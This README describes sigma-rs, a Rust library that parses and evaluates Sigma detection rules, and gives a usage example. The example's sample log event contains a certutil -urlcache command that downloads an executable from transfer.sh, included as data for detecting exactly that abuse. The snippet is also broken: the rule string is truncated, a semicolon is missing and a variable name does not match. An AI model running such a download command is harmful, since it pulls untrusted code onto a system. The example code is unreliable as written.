# sigma-rs
A Rust implementation and parser of [Sigma rules](https://github.com/SigmaHQ/sigma). Useful for building your own detection pipelines.

## Features
- support complex condition like ```(not test*) and ((1 of test1) or (all of test))```
- regex build cache
## Usage
```
let rule = r#"title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE#;
let json = r#"{
    "Image": "C:\\Windows\\system32\\certutil.exe",
    "ParentImage": "C:\\WINDOWS\\system32\\cmd.exe",
    "ProcessId": "10952",
    "utc_time": "2023-03-20 17:31:23",
    "ServerScore": "0",
    "CommandLine": "certutil  -urlcache \"-split\" \"-f\" \"http://transfer.sh/artifact.exe test.exe\"",
    "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
    "OriginalFile": "CertUtil.exe.mui",
    "log_type": "ProcessCreate"
  }"#
println!("{}", evaluate_sigma(parse_sigma(rule.to_string()), &source));
```

## Reference
- [sigma-go](https://github.com/bradleyjkemp/sigma-go) 
- [chainsaw](https://github.com/WithSecureLabs/chainsaw)